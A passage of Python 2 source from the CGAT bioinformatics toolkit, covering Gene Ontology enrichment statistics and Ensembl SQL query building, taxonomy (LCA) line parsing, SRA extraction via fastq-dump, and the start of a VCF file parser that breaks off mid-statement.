genes)
result.mNumGenes = len(genes)
result.mSampleCountsTotal = sample_counts_total
result.mSampleNumCategories = len(sample_counts)
result.mSampleGenes = sample_genes
# test for over or underrepresented categories in the slims
# report results for all go categories in the background
# so that also categories completely absent in the foreground (sample)
# are considered.
for go_id in background_counts.keys():
result_go = GOResult(go_id)
# use gene counts
result_go.mSampleCountsCategory = sample_counts.get(go_id, 0)
result_go.mSampleCountsTotal = len(sample_genes)
result_go.mBackgroundCountsTotal = len(background_genes)
result_go.mBackgroundCountsCategory = background_counts[go_id]
E.debug("processing %s: genes in foreground=%i, genes in backgound=%i, sample_counts=%i, background_counts=%i" %
(go_id,
len(sample_genes),
len(background_genes),
sample_counts.get(go_id, 0),
background_counts.get(go_id, 0),
)
)
if do_probabilities:
try:
result_go.UpdateProbabilities()
except AssertionError, msg:
print msg
print "# error while calculating probabilities for %s" % go_id
print "# genes in sample", sample_genes
print "# counts in sample: %i out of %i total" % (result_go.mSampleCountsCategory, result_go.mSampleCountsTotal)
print "# counts in background %i out of %i total" % (result_go.mBackgroundCountsCategory, result_go.mBackgroundCountsTotal)
for x in sample_genes.keys():
for y in gene2go[x]:
print x, str(y)
sys.exit(0)
result.mResults[go_id] = result_go
return result
# ------------------------------------------------------------------------
def GetGOStatement(go_type, database, species):
"""build statement to get GO assignments for genes from ENSEMBL."""
if database in ("ensembl_mart_27_1", ):
statement = """SELECT DISTINCTROW
gene_stable_id, glook_%s_id, description, olook_evidence_code
FROM %s.%s_gene_ensembl__go_%s__look
WHERE glook_%s_id IS NOT NULL
GROUP BY gene_stable_id, glook_%s_id, description
ORDER BY gene_stable_id
""" % (go_type,
database, species, go_type,
go_type, go_type)
elif database in ("ensembl_mart_31", "ensembl_mart_37", "ensembl_mart_41"):
statement = """SELECT DISTINCTROW
gene_stable_id, glook_%s_id, description, olook_evidence_code
FROM %s.%s_go_%s__go_%s__main
WHERE glook_%s_id IS NOT NULL
GROUP BY gene_stable_id, glook_%s_id, description
ORDER BY gene_stable_id
""" % (go_type,
database, species, go_type, go_type,
go_type, go_type)
elif re.search("core", database):
if go_type == "biol_process":
go_type = "biological_process"
elif go_type == "mol_function":
go_type = "molecular_function"
elif go_type == "cell_location":
go_type = "cellular_component"
else:
raise "unknown go_type %s" % go_type
x = re.search("(\d+)", database)
if not x:
raise "can't find version number in database %s" % database
version = int(x.groups()[0])
if version <= 54:
go_database = "ensembl_go_%s" % version
go_field = "acc"
statement = """SELECT DISTINCTROW
g.stable_id, xref.dbprimary_acc, go.name, 'NA'
FROM gene, transcript, translation,
gene_stable_id as g, object_xref as o, xref,
%(go_database)s.term AS go
WHERE gene.gene_id = transcript.gene_id
AND transcript.transcript_id = translation.transcript_id
AND g.gene_id = gene.gene_id
AND translation.translation_id = o.ensembl_id
AND xref.xref_id = o.xref_id
AND go.%(go_field)s = xref.dbprimary_acc
AND go.term_type = '%(go_type)s'
AND xref.external_db_id = 1000
""" % locals()
elif version <= 66:
go_database = "ensembl_ontology_%s" % version
go_field = "accession"
statement = """SELECT DISTINCTROW
g.stable_id, xref.dbprimary_acc, go.name, 'NA'
FROM gene, transcript, translation,
gene_stable_id as g, object_xref as o, xref,
%(go_database)s.term AS go,
%(go_database)s.ontology AS ontology
WHERE gene.gene_id = transcript.gene_id
AND transcript.transcript_id = translation.transcript_id
AND g.gene_id = gene.gene_id
AND translation.translation_id = o.ensembl_id
AND xref.xref_id = o.xref_id
AND go.%(go_field)s = xref.dbprimary_acc
AND go.ontology_id = ontology.ontology_id
AND ontology.namespace = '%(go_type)s'
AND xref.external_db_id = 1000
""" % locals()
else:
go_database = "ensembl_ontology_%s" % version
go_field = "accession"
statement = """SELECT DISTINCTROW
gene.stable_id, xref.dbprimary_acc, go.name, 'NA'
FROM gene, transcript, translation,
object_xref as o, xref,
%(go_database)s.term AS go,
%(go_database)s.ontology AS ontology
WHERE gene.gene_id = transcript.gene_id
AND transcript.transcript_id = translation.transcript_id
AND translation.translation_id = o.ensembl_id
AND xref.xref_id = o.xref_id
AND go.%(go_field)s = xref.dbprimary_acc
AND go.ontology_id = ontology.ontology_id
AND ontology.namespace = '%(go_type)s'
AND xref.external_db_id = 1000
""" % locals()
else:
raise "unknown ensmart version %s" % database
return statement
def ReadGene2GOFromDatabase(dbhandle, go_type, database, species):
"""read go assignments from ensembl database.
returns a dictionary of lists.
(one to many mapping of genes to GO categories)
and a dictionary of go-term to go information
Note: assumes that external_db_id for GO is 1000
"""
statement = GetGOStatement(go_type, database, species)
result = Database.executewait(dbhandle, statement,
retries=0).fetchall()
gene2go = {}
go2info = collections.defaultdict(GOInfo)
for gene_id, goid, description, evidence in result:
gm = GOMatch(goid, go_type, description, evidence)
gi = GOInfo(goid, go_type, description)
if gene_id not in gene2go:
gene2go[gene_id] = []
gene2go[gene_id].append(gm)
go2info[goid] = gi
return gene2go, go2info
def DumpGOFromDatabase(outfile,
dbhandle,
options):
"""read go assignments from database.
and dump them into a flatfile.
(one to many mapping of genes to GO categories)
and a dictionary of go-term to go information
"""
E.info("category\ttotal\tgenes\tcategories")
all_genes = collections.defaultdict(int)
all_categories = collections.defaultdict(int)
all_ntotal = 0
outfile.write("go_type\tgene_id\tgo_id\tdescription\tevidence\n")
for go_type in options.ontology:
genes = collections.defaultdict(int)
categories = collections.defaultdict(int)
ntotal = 0
statement = GetGOStatement(go_type, options.database_name,
options.species)
results = Database.executewait(
dbhandle, statement, retries=0).fetchall()
for result in results:
outfile.write("\t".join(map(str, (go_type,) + result)) + "\n")
gene_id, goid, description, evidence = result
genes[gene_id] += 1
categories[goid] += 1
ntotal += 1
all_genes[gene_id] += 1
all_categories[goid] += 1
all_ntotal += 1
E.info("%s\t%i\t%i\t%i" % (go_type, ntotal,
len(genes),
len(categories)))
E.info("%s\t%i\t%i\t%i" % ("all",
all_ntotal,
len(all_genes),
len(all_categories)))
return
# ---------------------------------------------------------------------------
def ReadGene2GOFromFile(infile, synonyms={}, obsolete={}):
"""reads GO mappings for all go_types from a
file.
If synonyms is given, goids in synynoms will be translated.
Terms in *obsolete* will be discarded.
returns two maps: gene2go maps genes to go categories
and go2info maps go categories to information.
"""
gene2gos = {}
go2infos = {}
c = E.Counter()
for line in infile:
if line[0] == "#":
continue
try:
go_type, gene_id, goid, description, evidence = line[
:-1].split("\t")
except ValueError, msg:
raise ValueError("parsing error in line '%s': %s" %
(line[:-1], msg))
if go_type == "go_type":
continue
c.input += 1
if goid in synonyms:
c.synonyms += 1
goid = synonyms[goid]
if goid in obsolete:
c.obsolete += 1
continue
gm = GOMatch(goid, go_type, description, evidence)
gi = GOInfo(goid, go_type, description)
if go_type not in gene2gos:
gene2gos[go_type] = {}
go2infos[go_type] = {}
gene2go = gene2gos[go_type]
go2info = go2infos[go_type]
if gene_id not in gene2go:
gene2go[gene_id] = []
gene2go[gene_id].append(gm)
go2info[goid] = gi
c.output += 1
E.debug("read gene2go assignments: %s" % str(c))
return gene2gos, go2infos
# ---------------------------------------------------------------------------
def CountGO(gene2go):
"""count number of genes and go categories in mapping."""
cats = collections.defaultdict(int)
nmaps = 0
for k, vv in gene2go.items():
for v in vv:
nmaps += 1
cats[v.mGOId] += 1
return len(gene2go), len(cats), nmaps, cats
def removeCategories(gene2go, categories):
'''remove all genes that map to *categories*.'''
for k, vv in gene2go.items():
gene2go[k] = [v for v in vv if v.mGOId not in categories]
# ---------------------------------------------------------------------------
def countGOs(gene2gos):
"""return map of number of genes and go categories in mapping."""
genes, goids = collections.defaultdict(int), collections.defaultdict(int)
for cat, gene2go in gene2gos.iteritems():
for gene_id, vv in gene2go.iteritems():
genes[gene_id] += 1
for v in vv:
goids[v.mGOId] += 1
return genes, goids
# ---------------------------------------------------------------------------
def ReadGeneLists(filename_genes, gene_pattern=None):
"""read gene lists from filename in matrix.
returns a tuple (list of all genes, dictionary of gene lists)
"""
if filename_genes == "-":
infile = sys.stdin
else:
infile = IOTools.openFile(filename_genes, "r")
headers, table = CSV.readTable(infile.readlines(), as_rows=False)
if filename_genes != "-":
infile.close()
all_genes = table[0]
# if there is only a single column, add a dummy column
if len(table) == 1:
table.append([1] * len(table[0]))
headers.append("foreground")
E.info("read %i genes from %s" % (len(all_genes), filename_genes))
if gene_pattern:
rx = re.compile(gene_pattern)
all_genes = map(lambda x: rx.search(x).groups()[0], all_genes)
gene_lists = collections.OrderedDict()
for header, col in zip(headers[1:], table[1:]):
s = list(set([x for x, y in zip(all_genes, col) if y != "0"]))
gene_lists[header] = set(s)
return all_genes, gene_lists
# ---------------------------------------------------------------------------
def buildGO2Genes(gene2gos, ancestors=None):
'''invert the dictionary genes2go.
If ancestors is given, add missing ancestral information.
'''
go2genes = collections.defaultdict(set)
for gene_id, terms in gene2gos.iteritems():
for term in terms:
go2genes[term.mGOId].add(gene_id)
if ancestors:
for anc in ancestors[term.mGOId]:
go2genes[anc].add(gene_id)
return go2genes
# ---------------------------------------------------------------------------
def GetCode(v):
"""return a code for over/underrepresentation."""
if v.mRatio > 1.0:
code = "+"
elif v.mRatio < 1.0:
code = "-"
else:
code = "?"
return code
# ---------------------------------------------------------------------------
def convertGo2Goslim(options):
"""read gene list with GO assignments and convert to GO slim
categories."""
E.info("reading GO assignments from stdin")
gene2gos, go2infos = ReadGene2GOFromFile(options.stdin)
input_genes, input_goids = countGOs(gene2gos)
#############################################################
# read GO ontology from file
assert options.filename_ontology, "please supply a GO ontology"
E.info("reading ontology from %s" % (options.filename_ontology))
infile = IOTools.openFile(options.filename_ontology)
ontology = readOntology(infile)
infile.close()
go2infos = collections.defaultdict(dict)
# substitute go2infos
for go in ontology.values():
go2infos[go.mNameSpace][go.mId] = GOInfo(go.mId,
go_type=go.mNameSpace,
description=go.mName)
E.info("reading GO assignments from %s" % options.filename_slims)
go_slims = GetGOSlims(IOTools.openFile(options.filename_slims, "r"))
if options.loglevel >= 1:
v = set()
for x in go_slims.values():
for xx in x:
v.add(xx)
E.info("read go slims from %s: go=%i, slim=%i" %
(options.filename_slims,
len(go_slims),
len(v)))
output_goids, output_genes = set(), set()
noutput = 0
options.stdout.write(
"\t".join(("go_type", "gene_id", "go_id",
"description", "evidence")) + "\n")
for category, gene2go in sorted(gene2gos.items()):
gene2go = MapGO2Slims(gene2go, go_slims, ontology)
for gene_id, values in sorted(gene2go.items()):
output_genes.add(gene_id)
for go in sorted(values, key=lambda x: x.mGOId):
output_goids.add(go.mGOId)
options.stdout.write("%s\t%s\t%s\t%s\t%s\n" %
(go.mGOType,
gene_id,
go.mGOId,
go.mDescription,
"NA", ))
noutput += 1
E.info(
("ninput_genes=%i, ninput_goids=%i, noutput_gene=%i, "
"noutput_goids=%i, noutput=%i") %
(len(input_genes), len(input_goids),
len(output_genes), len(output_goids),
noutput))
def outputResults(outfile,
pairs,
go2info,
options,
fdrs=None,
samples=None,
gene2go=None,
foreground=None,
gene2name=None):
'''output GO results to outfile.
If foreground is given, output a list of gene identifiers in the
foreground.
If gene2name is given, output a columns with gene
names (instead of identifiers)
'''
headers = ["code",
"scount", "stotal", "spercent",
"bcount", "btotal", "bpercent",
"ratio",
"pvalue", "pover", "punder",
"goid", "category", "description"]
if fdrs:
headers += ["fdr"]
if gene2go and foreground:
headers += ['foreground']
go2genes = buildGO2Genes(gene2go)
if gene2name:
headers += ['genes']
if samples:
headers += ["min", "max", "zscore", "mpover", "mpunder",
"nfdr_expected",
"CI95lower", "CI95upper"]
outfile.write("\t".join(headers) + "\n")
nselected = 0
for k, v in pairs:
code = GetCode(v)
n = go2info.get(k, GOInfo())
outfile.write("%s\t%s\t%s" % (code, str(v), n))
if options.fdr:
fdr = fdrs[k][0]
outfile.write("\t%f" % fdr)
if options.sample:
if k in samples:
s = samples[k]
# calculate values for z-score
if s.mStddev > 0:
zscore = abs(
float(v.mSampleCountsCategory) - s.mMean) / s.mStddev
else:
zscore = 0.0
outfile.write("\t%i\t%i\t%f\t%5.2e\t%5.2e\t%6.4f\t%6.4f\t%6.4f" %
(s.mMin,
s.mMax,
zscore,
min(s.mProbabilitiesOverRepresentation),
min(s.mProbabilitiesUnderRepresentation),
scipy.mean(s.mCounts),
scipy.stats.scoreatpercentile(s.mCounts, 5),
scipy.stats.scoreatpercentile(s.mCounts, 95),
))
if foreground:
if k in go2genes:
g = [x for x in go2genes[k] if x in foreground]
if gene2name:
g = [gene2name.get(x, '?') for x in g]
g = ";".join(g)
else:
g = ""
outfile.write("\t%s" % g)
outfile.write("\n")
def getSamples(gene2go, foreground, background, options, test_ontology,
go2info):
sample_size = options.sample
# List of all minimum probabilities in simulation
simulation_min_pvalues = []
E.info("sampling: calculating %i samples: " % (sample_size))
counts = {}
prob_overs = {}
prob_unders = {}
samples = {}
options.stdlog.write("# ")
options.stdlog.flush()
for x in range(sample_size):
if options.loglevel >= 1:
options.stdlog.write(".")
options.stdlog.flush()
# get shuffled array of genes from background
sample_genes = random.sample(background, len(foreground))
go_results = AnalyseGO(gene2go, sample_genes, background)
pairs = go_results.mResults.items()
for k, v in pairs:
if k not in counts:
counts[k] = []
prob_overs[k] = []
prob_unders[k] = []
counts[k].append(v.mSampleCountsCategory)
prob_overs[k].append(v.mProbabilityOverRepresentation)
prob_unders[k].append(v.mProbabilityUnderRepresentation)
simulation_min_pvalues.append(v.mPValue)
if options.loglevel >= 1:
sys.stdout.write("\n")
sys.stdout.flush()
E.info("sampling: sorting %i P-Values" % len(simulation_min_pvalues))
simulation_min_pvalues.sort()
simulation_min_pvalues = numpy.array(simulation_min_pvalues)
samples = {}
if options.output_filename_pattern:
filename = options.output_filename_pattern % {
'go': test_ontology, 'section': "samples"}
E.info("sampling results go to %s" % filename)
outfile = IOTools.openFile(filename, "w", create_dir=True)
else:
outfile = sys.stdout
outfile.write("\t".join(("goid", "min", "max", "mean", "median", "stddev",
"CI95lower", "CI95upper",
"pover", "punder", "goid",
"category", "description")) + "\n")
for k in counts.keys():
c = counts[k]
prob_overs[k].sort()
prob_unders[k].sort()
s = GOSample(min(c),
max(c),
scipy.mean(c),
numpy.std(c),
numpy.array(prob_overs[k]),
numpy.array(prob_unders[k]),
counts[k])
samples[k] = s
outfile.write("%s\t%i\t%i\t%f\t%f\t%f\t%f\t%f\t%f\t%f\t%s\n" %
(k,
min(c),
max(c),
scipy.mean(c),
scipy.median(c),
numpy.std(c),
scipy.stats.scoreatpercentile(c, 5),
scipy.stats.scoreatpercentile(c, 95),
min(prob_overs[k]),
min(prob_unders[k]),
go2info[k]))
if options.output_filename_pattern:
outfile.close()
return samples, simulation_min_pvalues
def computeFDRs(go_results,
foreground,
background,
options,
test_ontology,
gene2go,
go2info):
pairs = go_results.mResults.items()
E.info("calculating the FDRs using method `%s`" % options.qvalue_method)
samples = None
observed_min_pvalues = [min(x[1].mProbabilityOverRepresentation,
x[1].mProbabilityUnderRepresentation) for x in pairs]
fdrs = {}
method = options.qvalue_method
if options.qvalue_method == "storey":
# compute fdr via Storey's method
try:
fdr_data = Stats.doFDR(observed_min_pvalues)
except ValueError, msg:
E.warn("failure in q-value computation: %s" % msg)
E.warn("reverting to Bonferroni correction")
method = "bonf"
fdr_data = Stats.FDRResult()
l = float(len(observed_min_pvalues))
fdr_data.mQValues = [min(1.0, x * l) for x in observed_min_pvalues]
for pair, qvalue in zip(pairs, fdr_data.mQValues):
fdrs[pair[0]] = (qvalue, 1.0, 1.0)
elif options.qvalue_method == "empirical":
assert options.sample > 0, "requiring a sample size of > 0"
#######################################################################
# sampling
# for each GO-category:
# get maximum and minimum counts in x samples -> calculate minimum/maximum significance
# get average and stdev counts in x samples -> calculate z-scores for
# test set
samples, simulation_min_pvalues = getSamples(gene2go,
foreground,
background,
options,
test_ontology,
go2info)
# compute P-values from sampling
observed_min_pvalues.sort()
observed_min_pvalues = numpy.array(observed_min_pvalues)
sample_size = options.sample
for k, v in pairs:
if k in samples:
s = samples[k]
else:
raise KeyError("category %s not in samples" % k)
# calculate values for z-score
if s.mStddev > 0:
zscore = abs(
float(v.mSampleCountsCategory) - s.mMean) / s.mStddev
else:
zscore = 0.0
#############################################################
# FDR:
# For each p-Value p at node n:
# a = average number of nodes in each simulation run with P-Value < p
# this can be obtained from the array of all p-values and all nodes
# simply divided by the number of samples.
# aka: expfpos=experimental false positive rate
# b = number of nodes in observed data, that have a P-Value of less than p.
# aka: pos=positives in observed data
# fdr = a/b
pvalue = v.mPValue
# calculate values for FDR:
# nfdr = number of entries with P-Value better than node.
a = 0
while a < len(simulation_min_pvalues) and \
simulation_min_pvalues[a] < pvalue:
a += 1
a = float(a) / float(sample_size)
b = 0
while b < len(observed_min_pvalues) and \
observed_min_pvalues[b] < pvalue:
b += 1
if b > 0:
fdr = min(1.0, float(a) / float(b))
else:
fdr = 1.0
fdrs[k] = (fdr, a, b)
else:
qvalues = R['p.adjust'](
observed_min_pvalues, method=options.qvalue_method)
fdr_data = Stats.FDRResult()
fdr_data.mQValues = list(qvalues)
for pair, qvalue in zip(pairs, fdr_data.mQValues):
fdrs[pair[0]] = (qvalue, 1.0, 1.0)
return fdrs, samples, method
################################################################
################################################################
################################################################
def getFileName(options, **kwargs):
'''return a filename
Placeholders in filename are string-substituted with the
dictionary in kwargs.
'''
if options.output_filename_pattern:
filename = options.output_filename_pattern % kwargs
E.info("output for section '%s' go to %s" %
(kwargs.get("section", "unknown"), filename))
outfile = IOTools.openFile(filename, "w", create_dir=True)
else:
outfile = options.stdout
return outfile
################################################################
################################################################
################################################################
def buildMatrix(results, valuef, dtype=numpy.float, default=0):
'''build a matrix from a field in *results*
The value stored in the matrix is accessed via *valuef*.
'''
row_headers = [set([x[0] for x in y]) for y in results]
row_headers = sorted(list(row_headers[0].union(*row_headers[1:])))
map_row = dict(zip(row_headers, range(len(row_headers))))
matrix = numpy.zeros((len(row_headers), len(results)), dtype=dtype)
if default != 0:
matrix[:] = default
for col, pairs in enumerate(results):
for row, v in pairs:
try:
matrix[map_row[row]][col] = valuef(v)
except ValueError:
# ignore errors for log(0)
pass
return matrix, row_headers
################################################################
################################################################
################################################################
def selectSignificantResults(pairs, fdrs, options):
'''select a set of significant results.
'''
filtered_pairs = []
for k, v in pairs:
is_ok = False
pvalue = v.mPValue
if options.fdr:
(fdr, expfpos, pos) = fdrs[k]
if fdr < options.threshold:
is_ok = True
else:
if pvalue < options.threshold:
is_ok = True
if is_ok:
filtered_pairs.append((k, v))
return filtered_pairs
################################################################
################################################################
################################################################
def outputMultipleGeneListResults(results,
all_genelists_with_results,
test_ontology,
go2info,
options,
section):
'''select a set of significant results.
'''
col_headers = all_genelists_with_results
if len(results) == 0:
E.warn('no significant results - no matrices output')
return
assert len(col_headers) == len(results)
def _output(section, subsection, valuef, dtype):
# fold change matrix
matrix, row_headers = buildMatrix(results,
valuef=valuef,
dtype=dtype)
outfile = getFileName(options,
go=test_ontology,
section=section,
set='%s_all' % subsection)
IOTools.writeMatrix(
outfile, matrix, row_headers, col_headers, row_header="category")
outfile = getFileName(options,
go=test_ontology,
section=section,
set='%s_alldesc' % subsection)
IOTools.writeMatrix(outfile, matrix,
["%s:%s" % (x, go2info[x].mDescription)
for x in row_headers],
col_headers, row_header="category")
_output('l2fold', section,
valuef=lambda x: math.log(x.mRatio + 0.00000001, 2),
dtype=numpy.float)
_output('l10pvalue', section,
valuef=lambda x: int(-10 * math.log(x.mPValue, 10)),
dtype=numpy.int)
_output('l10qvalue', section,
valuef=lambda x: int(-10 * math.log(x.mQValue, 10)),
dtype=numpy.int)
def pairwiseGOEnrichment(results_per_genelist, labels, test_ontology, go2info,
options):
'''compute pairwise enrichment between sets.
The purpose of this method is to find if there are categories that are differently enriched
in a pair of gene lists.
The appropriate test here is the Chi-Squared test.
The assumption is that the background set is the same in all gene lists.
The workflow is thus::
for each combination of two gene lists:
for each GO category:
get counts in foreground, total counts of foreground
compute chi-square enrichment output
save P-value
apply fdr - output significant differences.
'''
dicts = [dict(x) for x in results_per_genelist]
PairResult = collections.namedtuple("PairResult",
"goid set1 set2 counts1 total1 pvalue1 qvalue1 counts2 total2 pvalue2 qvalue2 pvalue qvalue description")
outfile = getFileName(options,
go=test_ontology,
section='summary',
set="pairs")
outfile.write(
"set1\tset2\ttotal1\ttotal2\tshared\tskipped\ttested\tsignificant\tinsignificant\n")
results = []
total = len(dicts) * (len(dicts) - 1) / 2
iteration = 0
min_observed_counts = options.pairs_min_observed_counts
for x, genelist1 in enumerate(dicts):
x_go_categories = set(genelist1.keys())
for y, genelist2 in enumerate(dicts[:x]):
iteration += 1
if iteration % 10 == 0:
E.info("iteration: %i/%i (%5.2f%%)" %
(iteration, total, 100.0 * iteration / total))
y_go_categories = set(genelist2.keys())
shared = x_go_categories.intersection(y_go_categories)
c = E.Counter()
for category in shared:
c.shared += 1
xx = genelist1[category]
yy = genelist2[category]
# discard all tests with few observations in the observed
# counts
if xx.mSampleCountsCategory < min_observed_counts and yy.mSampleCountsCategory < min_observed_counts:
c.skipped += 1
continue
observed = (xx.mSampleCountsCategory, yy.mSampleCountsCategory)
aa, bb, cc, dd = \
(xx.mSampleCountsCategory,
yy.mSampleCountsCategory,
xx.mSampleCountsTotal - xx.mSampleCountsCategory,
yy.mSampleCountsTotal - yy.mSampleCountsCategory)
if cc == dd == 0:
c.skipped += 1
continue
c.tested += 1
fisher, pvalue = scipy.stats.fisher_exact(numpy.array(
((aa, bb),
(cc, dd))))
if pvalue < 0.05:
c.significant_pvalue += 1
else:
c.insignificant_pvalue += 1
results.append(PairResult._make((category,
labels[x],
labels[y],
xx.mSampleCountsCategory,
xx.mSampleCountsTotal,
xx.mPValue,
xx.mQValue,
yy.mSampleCountsCategory,
yy.mSampleCountsTotal,
yy.mPValue,
yy.mQValue,
pvalue,
1.0,
go2info[category].mDescription)))
outfile.write("\t".join(map(str,
(labels[x], labels[y],
len(x_go_categories),
len(y_go_categories),
c.shared,
c.skipped,
c.tested,
c.significant_pvalue,
c.insignicant_pvalue))) + "\n")
if options.output_filename_pattern:
outfile.close()
if options.fdr:
pvalues = [x.pvalue for x in results]
if options.qvalue_method == "storey":
# compute fdr via Storey's method
try:
fdr_data = Stats.doFDR(pvalues)
except ValueError, msg:
E.warn("failure in q-value computation: %s" % msg)
E.warn("reverting to Bonferroni correction")
method = "bonf"
fdr_data = Stats.FDRResult()
l = float(len(pvalues))
fdr_data.mQValues = [min(1.0, x * l) for x in pvalues]
qvalues = fdr_data.mQValues
else:
qvalues = R['p.adjust'](pvalues, method=options.qvalue_method)
# update qvalues
results = [x._replace(qvalue=y) for x, y in zip(results, qvalues)]
outfile = getFileName(options,
go=test_ontology,
section='pairs',
set="pairs")
outfile.write("\t".join(PairResult._fields) + "\n")
for result in results:
outfile.write("\t".join(map(str, result)) + "\n")
if options.output_filename_pattern:
outfile.close()
```
#### File: cgat/CGAT/LCA.py
```python
class LCA(object):
'''
lca class describing the taxa associateed with a sequence
'''
def __init__(self):
self.identifier = None
self.domain = None
self.superkingdom_plus = None
self.superkingdom_plus_plus = None
self.kingdom = None
self.kingdom_plus = None
self.kingdom_plus_plus = None
self.phylum = None
self.phylum_plus = None
self.phylum_plus_plus = None
self._class = None
self._class_plus = None
self._class_plus_plus = None
self.order = None
self.order_plus = None
self.order_plus_plus = None
self.family = None
self.family_plus = None
self.family_plus_plus = None
self.genus = None
self.genus_plus = None
self.genus_plus_plus = None
self.species = None
self.species_plus = None
self.species_plus_plus = None
self.level = None
def parse(self, line):
'''
parse the line
'''
data = line.split(";")
self.identifier = data[0]
for taxa in data[2:]:
taxa = taxa.strip()
# ignore root
if "[root" in taxa:
continue
if "[" not in taxa:
continue
taxa = taxa.split(" ")
level, tax = taxa[0], taxa[1:]
level = level.replace("[", "").replace("]", "")
if len(tax) > 1:
tax = "_".join(tax)
else:
tax = tax[0]
# Eukaryotes have a lot of sub-taxa e.g. Phylum+++++++.
# Superkingdom is taken as the Domain and then kingdom
# and so on. At the moment we are only going to consider
# up to two sub-levels per global level
if level == "SuperKingdom":
self.domain = tax
elif level == "SuperKingdom+":
self.superkingdom_plus = tax
elif level == "SuperKingdom++":
self.superkingdom_plus_plus = tax
elif level == "Kingdom":
self.kingdom = tax
elif level == "Kingdom+":
self.kingdom_plus = tax
elif level == "Kingdom++":
self.kingdom_plus_plus = tax
elif level == "Phylum":
self.phylum = tax
elif level == "Phylum+":
self.phylum_plus = tax
elif level == "Phylum++":
self.phylum_plus_plus = tax
elif level == "Class":
self._class = tax
elif level == "Class+":
self._class_plus = tax
elif level == "Class++":
self._class_plus_plus = tax
elif level == "Order":
self.order = tax
elif level == "Order+":
self.order_plus = tax
elif level == "Order++":
self.order_plus_plus = tax
elif level == "Family":
self.family = tax
elif level == "Family+":
self.family_plus = tax
elif level == "Family++":
self.family_plus_plus = tax
elif level == "Genus":
self.genus = tax
elif level == "Genus+":
self.genus_plus = tax
elif level == "Genus++":
self.genus_plus_plus = tax
elif level == "Species":
self.species = tax
elif level == "Species+":
self.species_plus = tax
elif level == "Species++":
self.species_plus_plus = tax
# make NA id doesn't exist in taxonomy
if not self.domain:
self.domain = "NA"
if not self.superkingdom_plus:
self.superkingdom_plus = "NA"
if not self.superkingdom_plus_plus:
self.superkingdom_plus_plus = "NA"
if not self.kingdom:
self.kingdom = "NA"
if not self.kingdom_plus:
self.kingdom_plus = "NA"
if not self.kingdom_plus_plus:
self.kingdom_plus_plus = "NA"
if not self.phylum:
self.phylum = "NA"
if not self.phylum_plus:
self.phylum_plus = "NA"
if not self.phylum_plus_plus:
self.phylum_plus_plus = "NA"
if not self._class:
self._class = "NA"
if not self._class_plus:
self._class_plus = "NA"
if not self._class_plus_plus:
self._class_plus_plus = "NA"
if not self.order:
self.order = "NA"
if not self.order_plus:
self.order_plus = "NA"
if not self.order_plus_plus:
self.order_plus_plus = "NA"
if not self.family:
self.family = "NA"
if not self.family_plus:
self.family_plus = "NA"
if not self.family_plus_plus:
self.family_plus_plus = "NA"
if not self.genus:
self.genus = "NA"
if not self.genus_plus:
self.genus_plus = "NA"
if not self.genus_plus_plus:
self.genus_plus_plus = "NA"
if not self.species:
self.species = "NA"
if not self.species_plus:
self.species_plus = "NA"
if not self.species_plus_plus:
self.species_plus_plus = "NA"
return self
###############################
###############################
###############################
def iterate(infile):
'''
LCA results iterator
'''
for line in infile.readlines():
lca = LCA()
lca = lca.parse(line)
yield lca
```
#### File: cgat/CGAT/Sra.py
```python
import os
import glob
import tempfile
import shutil
import CGAT.Experiment as E
import CGAT.Fastq as Fastq
import CGAT.IOTools as IOTools
def peek(sra, outdir=None):
"""return the full file names for all files which will be extracted
Parameters
----------
outdir : path
perform extraction in outdir. If outdir is None, the extraction
will take place in a temporary directory, which will be deleted
afterwards.
Returns
-------
files : list
A list of fastq formatted files that are contained in the archive.
format : string
The quality score format in the :term:`fastq` formatted files.
"""
if outdir is None:
workdir = tempfile.mkdtemp()
else:
workdir = outdir
# --split-files creates files called prefix_#.fastq.gz,
# where # is the read number.
# If file cotains paired end data:
# output = prefix_1.fastq.gz, prefix_2.fastq.gz
# *special case: unpaired reads in a paired end --> prefix.fastq.gz
# *special case: if paired reads are stored in a single read,
# fastq-dump will split. There might be a joining
# sequence. The output would thus be:
# prefix_1.fastq.gz, prefix_2.fastq.gz, prefix_3.fastq.gz
# You want files 1 and 3.
E.run("""fastq-dump --split-files --gzip -X 1000
--outdir %(workdir)s %(sra)s""" % locals())
f = sorted(glob.glob(os.path.join(workdir, "*.fastq.gz")))
ff = [os.path.basename(x) for x in f]
if len(f) == 1:
# sra file contains one read: output = prefix.fastq.gz
pass
elif len(f) == 2:
# sra file contains read pairs:
# output = prefix_1.fastq.gz, prefix_2.fastq.gz
assert ff[0].endswith(
"_1.fastq.gz") and ff[1].endswith("_2.fastq.gz")
elif len(f) == 3:
if ff[2].endswith("_3.fastq.gz"):
f = glob.glob(os.path.join(workdir, "*_[13].fastq.gz"))
else:
f = glob.glob(os.path.join(workdir, "*_[13].fastq.gz"))
# check format of fastqs in .sra
fastq_format = Fastq.guessFormat(IOTools.openFile(f[0], "r"), raises=False)
fastq_datatype = Fastq.guessDataType(IOTools.openFile(f[0], "r"), raises=True)
if outdir is None:
shutil.rmtree(workdir)
return f, fastq_format, fastq_datatype
def extract(sra, outdir, tool="fastq-dump"):
"""return statement for extracting the SRA file in `outdir`.
possible tools are fastq-dump and abi-dump. Use abi-dump for colorspace"""
if tool == "fastq-dump":
tool += " --split-files"
statement = """%(tool)s --gzip --outdir %(outdir)s %(sra)s""" % locals()
return statement
```
#### File: cgat/CGAT/VCF.py
```python
import sys
class VCFEntry:
"""A VCF Entry"""
def __init__(self, data, samples):
assert len(data) == len(samples) + 9
self.contig, self.pos, self.id, self.ref, self.alt, self.qual, \
self.filter, self.info, self.format = \
data[:9]
self.genotypes = dict(zip(samples, data[9:]))
self.order = samples
def __str__(self):
return "\t".join(map(str, (
self.contig, self.pos, self.id, self.ref, self.alt, self.qual,
self.filter, self.info, self.format,
"\t".join([self.genotypes[x] for x in self.order]))))
class VCFFile:
"""A VCF File"""
def __init__(self, infile):
self.infile = infile
self.format = {}
self.info = {}
self.fileformat = None
while 1:
line = self.infile.readline()
if line.startswith("##"):
self.addMetaFromLine(line[2:-1])
continue
elif line.startswith("#CHROM"):
self.samples = line[:-1].split("\t")[9:]
continue
elif line.startswith("#"):
continue
break
self.line = line
def writeHeader(self, outfile, order=None):
outfile.write("##fileformat=%s\n" % self.fileformat)
for key, values in self.format.iteritems():
outfile.write("##FORMAT=%s,%s\n" % (key, ",".join(values)))
for key, values in self.info.iteritems():
outfile.write("##INFO=%s,%s\n" % (key, ",".join(values)))
outfile.write(
"#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\t")
if order:
assert len(order) == len(self.samples), \
